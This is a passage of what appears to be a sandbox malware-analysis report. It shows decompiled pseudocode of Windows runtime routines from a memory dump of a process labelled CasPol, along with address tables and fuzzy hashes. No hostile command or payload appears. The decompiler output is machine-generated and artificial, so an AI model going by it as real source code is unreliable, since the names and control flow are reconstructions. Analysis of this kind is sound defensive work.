					_push( *(__ecx + 0x24));
					E017695D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E017695D0();
				_t33 =  *0x18184c4; // 0x0
				L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x18184c4; // 0x0
				L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x18184c4; // 0x0
				E01742280(L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18186b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E017695D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E017695D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E01729325();
					_t50 =  *0x18184c4; // 0x0
					return E0177D0D1(L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                                                                                                                                                                                                                0x01729240
                                                                                                                                                                                                                                                                                                0x01729242
                                                                                                                                                                                                                                                                                                0x01729247
                                                                                                                                                                                                                                                                                                0x0172924c
                                                                                                                                                                                                                                                                                                0x0172924e
                                                                                                                                                                                                                                                                                                0x01729255
                                                                                                                                                                                                                                                                                                0x01729257
                                                                                                                                                                                                                                                                                                0x0172925a
                                                                                                                                                                                                                                                                                                0x0172925f
                                                                                                                                                                                                                                                                                                0x0172925f
                                                                                                                                                                                                                                                                                                0x01729266
                                                                                                                                                                                                                                                                                                0x01729271
                                                                                                                                                                                                                                                                                                0x01729276
                                                                                                                                                                                                                                                                                                0x01729279
                                                                                                                                                                                                                                                                                                0x0172927e
                                                                                                                                                                                                                                                                                                0x01729295
                                                                                                                                                                                                                                                                                                0x0172929a
                                                                                                                                                                                                                                                                                                0x017292b1
                                                                                                                                                                                                                                                                                                0x017292b6
                                                                                                                                                                                                                                                                                                0x017292d7
                                                                                                                                                                                                                                                                                                0x017292dc
                                                                                                                                                                                                                                                                                                0x017292e0
                                                                                                                                                                                                                                                                                                0x017292e6
                                                                                                                                                                                                                                                                                                0x017292e8
                                                                                                                                                                                                                                                                                                0x017292ee
                                                                                                                                                                                                                                                                                                0x01729332
                                                                                                                                                                                                                                                                                                0x01729333
                                                                                                                                                                                                                                                                                                0x01729337
                                                                                                                                                                                                                                                                                                0x01729338
                                                                                                                                                                                                                                                                                                0x0172933a
                                                                                                                                                                                                                                                                                                0x0172933a
                                                                                                                                                                                                                                                                                                0x0172933d
                                                                                                                                                                                                                                                                                                0x01729342
                                                                                                                                                                                                                                                                                                0x01729342
                                                                                                                                                                                                                                                                                                0x01729345
                                                                                                                                                                                                                                                                                                0x01729349
                                                                                                                                                                                                                                                                                                0x0172934e
                                                                                                                                                                                                                                                                                                0x01729352
                                                                                                                                                                                                                                                                                                0x01729357
                                                                                                                                                                                                                                                                                                0x017292f4
                                                                                                                                                                                                                                                                                                0x017292f4
                                                                                                                                                                                                                                                                                                0x017292f6
                                                                                                                                                                                                                                                                                                0x017292f9
                                                                                                                                                                                                                                                                                                0x01729300
                                                                                                                                                                                                                                                                                                0x01729306
                                                                                                                                                                                                                                                                                                0x01729324
                                                                                                                                                                                                                                                                                                0x01729324

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5475215c2ad370f52b72b6e207af15b202413137d51c00b800fbfdd4e67b14b3
                                                                                                                                                                                                                                                                                                • Instruction ID: c9ec76b3c755baf9f2ce23a9f67b1106dea89da42b33b5b99ba81b24c32d53a9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5475215c2ad370f52b72b6e207af15b202413137d51c00b800fbfdd4e67b14b3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C215932040611DFC726EF68CA84F1AF7B9FF18708F14456CE209866A6CB34E942CB44
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017B4257 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                                			E017B4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x18008d0);
				E0177D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E017B41E8(__ebx, __edi, __ecx, _t39);
				L0173EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x18187e4;
					_t18 =  *0x18187e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x1815cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x18187e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x18187e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L01727055(_t31 + 0xfffffff8);
								_t24 =  *0x18187e0; // 0x0
								_t18 = _t24 - 1;
								 *0x18187e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x1815cd0;
				if( *0x1815cd0 <= 0) {
					L01727055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x18187e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x18187e8 = _t30;
						 *0x18187e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0177D0D1(L017B4320());
			}















                                                                                                                                                                                                                                                                                                0x017b4257
                                                                                                                                                                                                                                                                                                0x017b4257
                                                                                                                                                                                                                                                                                                0x017b4257
                                                                                                                                                                                                                                                                                                0x017b4259
                                                                                                                                                                                                                                                                                                0x017b425e
                                                                                                                                                                                                                                                                                                0x017b4263
                                                                                                                                                                                                                                                                                                0x017b4265
                                                                                                                                                                                                                                                                                                0x017b4273
                                                                                                                                                                                                                                                                                                0x017b4278
                                                                                                                                                                                                                                                                                                0x017b427c
                                                                                                                                                                                                                                                                                                0x017b427f
                                                                                                                                                                                                                                                                                                0x017b4281
                                                                                                                                                                                                                                                                                                0x017b4287
                                                                                                                                                                                                                                                                                                0x017b42d7
                                                                                                                                                                                                                                                                                                0x017b42d7
                                                                                                                                                                                                                                                                                                0x017b42da
                                                                                                                                                                                                                                                                                                0x017b428d
                                                                                                                                                                                                                                                                                                0x017b428d
                                                                                                                                                                                                                                                                                                0x017b428f
                                                                                                                                                                                                                                                                                                0x017b4292
                                                                                                                                                                                                                                                                                                0x017b4297
                                                                                                                                                                                                                                                                                                0x017b429c
                                                                                                                                                                                                                                                                                                0x017b42a0
                                                                                                                                                                                                                                                                                                0x017b42a6
                                                                                                                                                                                                                                                                                                0x017b42a8
                                                                                                                                                                                                                                                                                                0x017b42ae
                                                                                                                                                                                                                                                                                                0x017b42b3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017b42ba
                                                                                                                                                                                                                                                                                                0x017b42ba
                                                                                                                                                                                                                                                                                                0x017b42bf
                                                                                                                                                                                                                                                                                                0x017b42c5
                                                                                                                                                                                                                                                                                                0x017b42ca
                                                                                                                                                                                                                                                                                                0x017b42cf
                                                                                                                                                                                                                                                                                                0x017b42d0
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017b42d0
                                                                                                                                                                                                                                                                                                0x017b42b3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017b42a6
                                                                                                                                                                                                                                                                                                0x017b429c
                                                                                                                                                                                                                                                                                                0x017b42dc
                                                                                                                                                                                                                                                                                                0x017b42dc
                                                                                                                                                                                                                                                                                                0x017b42e3
                                                                                                                                                                                                                                                                                                0x017b4309
                                                                                                                                                                                                                                                                                                0x017b42e5
                                                                                                                                                                                                                                                                                                0x017b42e5
                                                                                                                                                                                                                                                                                                0x017b42e8
                                                                                                                                                                                                                                                                                                0x017b42ee
                                                                                                                                                                                                                                                                                                0x017b42f0
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017b42f2
                                                                                                                                                                                                                                                                                                0x017b42f2
                                                                                                                                                                                                                                                                                                0x017b42f4
                                                                                                                                                                                                                                                                                                0x017b42f7
                                                                                                                                                                                                                                                                                                0x017b42f9
                                                                                                                                                                                                                                                                                                0x017b4300
                                                                                                                                                                                                                                                                                                0x017b4300
                                                                                                                                                                                                                                                                                                0x017b42f0
                                                                                                                                                                                                                                                                                                0x017b430e
                                                                                                                                                                                                                                                                                                0x017b431f

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6df6779b97b4c0148ad2284616b737677563628fa2e6369f9edc489f896bebb6
                                                                                                                                                                                                                                                                                                • Instruction ID: 48840221ef799211a4fb714d875e1a22672f2e30f4a8d2cc6e7bd1392c489297
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6df6779b97b4c0148ad2284616b737677563628fa2e6369f9edc489f896bebb6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10218872901601CFCB26DF68D084B94FBA4FB86354B5486AAC1578B39ADB308692CF40
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0172C962 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                                                                                                                                                                			E0172C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x181d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					L0173EEF0(0x18170a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(L017AF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0173EB70(_t29, 0x18170a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return L0176B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E017AF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x18170c0; // 0x0
					while(_t38 != 0x18170c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x181b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                                                                                                                                                                                                                0x0172c96a
                                                                                                                                                                                                                                                                                                0x0172c974
                                                                                                                                                                                                                                                                                                0x0172c988
                                                                                                                                                                                                                                                                                                0x0172c98a
                                                                                                                                                                                                                                                                                                0x01797c9d
                                                                                                                                                                                                                                                                                                0x01797c9f
                                                                                                                                                                                                                                                                                                0x01797ca4
                                                                                                                                                                                                                                                                                                0x01797cae
                                                                                                                                                                                                                                                                                                0x01797cf0
                                                                                                                                                                                                                                                                                                0x01797cf5
                                                                                                                                                                                                                                                                                                0x01797cfa
                                                                                                                                                                                                                                                                                                0x0172c992
                                                                                                                                                                                                                                                                                                0x0172c996
                                                                                                                                                                                                                                                                                                0x0172c997
                                                                                                                                                                                                                                                                                                0x0172c998
                                                                                                                                                                                                                                                                                                0x0172c9a3
                                                                                                                                                                                                                                                                                                0x0172c9a3
                                                                                                                                                                                                                                                                                                0x01797cb0
                                                                                                                                                                                                                                                                                                0x01797cb7
                                                                                                                                                                                                                                                                                                0x01797cbb
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01797cbd
                                                                                                                                                                                                                                                                                                0x01797ce8
                                                                                                                                                                                                                                                                                                0x01797cc5
                                                                                                                                                                                                                                                                                                0x01797cc8
                                                                                                                                                                                                                                                                                                0x01797cca
                                                                                                                                                                                                                                                                                                0x01797cd0
                                                                                                                                                                                                                                                                                                0x01797cd6
                                                                                                                                                                                                                                                                                                0x01797cde
                                                                                                                                                                                                                                                                                                0x01797ce4
                                                                                                                                                                                                                                                                                                0x01797ce4
                                                                                                                                                                                                                                                                                                0x01797cd0
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01797ce8
                                                                                                                                                                                                                                                                                                0x0172c990
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4edbef1d0bd4cd75667f0bcace253af28d3de3c721fd301231c86b90909e6463
                                                                                                                                                                                                                                                                                                • Instruction ID: c86d5bed9deca19a1e89c9243b969e4a693398b2e2ce1fe2bebdd5499a46521a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4edbef1d0bd4cd75667f0bcace253af28d3de3c721fd301231c86b90909e6463
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2811C2323107469BCB15AF2CEC89A2AF7A9BF95710B00052DE94193655DB20EE18CBD1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01729080 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                                                                                                                                                                			E01729080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x18185ec;
				E01742280(_t48, 0x18185ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return L0173FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x181538c; // 0x77e46828
					if( *_t84 != 0x1815388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x17ff6e8);
						E0177D0E8(0x18185ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E017F88F5(_t80, _t85, 0x1815388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x18186c0; // 0x11607b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x18186b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E01742280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E017F88F5(0x18185ec, _t85, 0x1815388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												L0176AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x181b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x18184c0;
																			if(_t82 >=  *0x18184c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E017F9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0172922A(_t99);
										_t64 = E01747D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E017F8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x18186c0; // 0x11607b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x18186b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x18186bc;
													_t87 = 0x18186b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01729240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x18186c4;
												_t87 = 0x18186c0;
												L27:
												E01759B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0177D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1815388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x181538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                                                                                                                                                                                                                0x01729082
                                                                                                                                                                                                                                                                                                0x01729083
                                                                                                                                                                                                                                                                                                0x01729084
                                                                                                                                                                                                                                                                                                0x01729085
                                                                                                                                                                                                                                                                                                0x01729087
                                                                                                                                                                                                                                                                                                0x01729096
                                                                                                                                                                                                                                                                                                0x01729098
                                                                                                                                                                                                                                                                                                0x01729098
                                                                                                                                                                                                                                                                                                0x0172909e
                                                                                                                                                                                                                                                                                                0x017290a8
                                                                                                                                                                                                                                                                                                0x017290e7
                                                                                                                                                                                                                                                                                                0x017290e7
                                                                                                                                                                                                                                                                                                0x017290aa
                                                                                                                                                                                                                                                                                                0x017290b0
                                                                                                                                                                                                                                                                                                0x017290b7
                                                                                                                                                                                                                                                                                                0x017290bd
                                                                                                                                                                                                                                                                                                0x017290dd
                                                                                                                                                                                                                                                                                                0x017290e6
                                                                                                                                                                                                                                                                                                0x017290bf
                                                                                                                                                                                                                                                                                                0x017290bf
                                                                                                                                                                                                                                                                                                0x017290c7
                                                                                                                                                                                                                                                                                                0x017290cf
                                                                                                                                                                                                                                                                                                0x017290f1
                                                                                                                                                                                                                                                                                                0x017290f2
                                                                                                                                                                                                                                                                                                0x017290f4
                                                                                                                                                                                                                                                                                                0x017290f5
                                                                                                                                                                                                                                                                                                0x017290f6
                                                                                                                                                                                                                                                                                                0x017290f7
                                                                                                                                                                                                                                                                                                0x017290f8
                                                                                                                                                                                                                                                                                                0x017290f9
                                                                                                                                                                                                                                                                                                0x017290fa
                                                                                                                                                                                                                                                                                                0x017290fb
                                                                                                                                                                                                                                                                                                0x017290fc
                                                                                                                                                                                                                                                                                                0x017290fd
                                                                                                                                                                                                                                                                                                0x017290fe
                                                                                                                                                                                                                                                                                                0x017290ff
                                                                                                                                                                                                                                                                                                0x01729100
                                                                                                                                                                                                                                                                                                0x01729102
                                                                                                                                                                                                                                                                                                0x01729107
                                                                                                                                                                                                                                                                                                0x0172910c
                                                                                                                                                                                                                                                                                                0x01729110
                                                                                                                                                                                                                                                                                                0x01729113
                                                                                                                                                                                                                                                                                                0x01729115
                                                                                                                                                                                                                                                                                                0x01729136
                                                                                                                                                                                                                                                                                                0x0172913f
                                                                                                                                                                                                                                                                                                0x01729143
                                                                                                                                                                                                                                                                                                0x017837e4
                                                                                                                                                                                                                                                                                                0x017837e4
                                                                                                                                                                                                                                                                                                0x01729117
                                                                                                                                                                                                                                                                                                0x01729117
                                                                                                                                                                                                                                                                                                0x0172911d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0172911f
                                                                                                                                                                                                                                                                                                0x0172911f
                                                                                                                                                                                                                                                                                                0x01729125
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729127
                                                                                                                                                                                                                                                                                                0x0172912d
                                                                                                                                                                                                                                                                                                0x01729130
                                                                                                                                                                                                                                                                                                0x01729134
                                                                                                                                                                                                                                                                                                0x01729158
                                                                                                                                                                                                                                                                                                0x0172915d
                                                                                                                                                                                                                                                                                                0x01729161
                                                                                                                                                                                                                                                                                                0x01729168
                                                                                                                                                                                                                                                                                                0x01783715
                                                                                                                                                                                                                                                                                                0x0172916e
                                                                                                                                                                                                                                                                                                0x0172916e
                                                                                                                                                                                                                                                                                                0x01729175
                                                                                                                                                                                                                                                                                                0x01729177
                                                                                                                                                                                                                                                                                                0x0172917e
                                                                                                                                                                                                                                                                                                0x0172917f
                                                                                                                                                                                                                                                                                                0x01729182
                                                                                                                                                                                                                                                                                                0x01729182
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0172918a
                                                                                                                                                                                                                                                                                                0x0172918d
                                                                                                                                                                                                                                                                                                0x0172918f
                                                                                                                                                                                                                                                                                                0x01729192
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x01729198
                                                                                                                                                                                                                                                                                                0x0172919a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178371f
                                                                                                                                                                                                                                                                                                0x01783721
                                                                                                                                                                                                                                                                                                0x01783727
                                                                                                                                                                                                                                                                                                0x0178372f
                                                                                                                                                                                                                                                                                                0x01783733
                                                                                                                                                                                                                                                                                                0x01783735
                                                                                                                                                                                                                                                                                                0x01783738
                                                                                                                                                                                                                                                                                                0x0178373b
                                                                                                                                                                                                                                                                                                0x0178373d
                                                                                                                                                                                                                                                                                                0x01783740
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783746
                                                                                                                                                                                                                                                                                                0x01783746
                                                                                                                                                                                                                                                                                                0x01783749
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178374f
                                                                                                                                                                                                                                                                                                0x0178374f
                                                                                                                                                                                                                                                                                                0x01783751
                                                                                                                                                                                                                                                                                                0x01783757
                                                                                                                                                                                                                                                                                                0x01783759
                                                                                                                                                                                                                                                                                                0x0178375c
                                                                                                                                                                                                                                                                                                0x0178375c
                                                                                                                                                                                                                                                                                                0x0178375e
                                                                                                                                                                                                                                                                                                0x0178375e
                                                                                                                                                                                                                                                                                                0x01783761
                                                                                                                                                                                                                                                                                                0x01783764
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783766
